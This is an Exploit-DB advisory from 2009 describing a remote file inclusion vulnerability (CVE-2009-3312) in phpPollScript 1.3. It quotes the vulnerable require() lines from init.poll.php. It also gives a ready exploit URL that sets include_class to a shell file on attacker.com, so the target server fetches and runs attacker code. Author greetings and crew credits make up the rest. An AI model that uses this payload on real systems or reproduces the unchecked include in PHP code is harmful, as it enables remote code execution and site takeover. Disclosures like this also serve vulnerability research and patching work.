phpPollScript <= 1.3 include_class Remote File Inclusion Vulnerability

2009-09-16T00:00:00
ID EDB-ID:9703
Type exploitdb
Reporter cr4wl3r
Modified 2009-09-16T00:00:00

Description

phpPollScript <= 1.3 (include_class) Remote File Inclusion Vulnerability. CVE-2009-3312. Webapps exploit for php platform

                                        
                                            ########################################################################
#phpPollScript &lt;= 1.3 Remote File Include Vulnerability
#Download Script      :  http://download.tomex.org/phpPollScriptv13b.zip
#Author               :  cr4wl3r 
#Contact              :  cr4wl3r[4t]linuxmail[dot]org 
#Location             :  Gorontalo - INDONESIA
########################################################################
#file :
#  init.poll.php
# line 2 $inc_path = dirname($include_class);
# line 3 require ($inc_path."/voting.poll.php");
########################################################################
#3xplo!t :
#http://target.com/[path]/php/init.poll.php?include_class=http://attacker.com/shell.txt/test/
########################################################################
#Greetz        : MyMom [alm]
#Thanks 2      : opt!x hacker, xoron, irvian, cyberlog, EA ngel, bl4ck_3ng1n3, Hmei7, zvtral
########################################################################
#sekuritionline.net (all crew sekuritionline)
#manadocoding.net (all crew manadocoding)
########################################################################

# milw0rm.com [2009-09-16]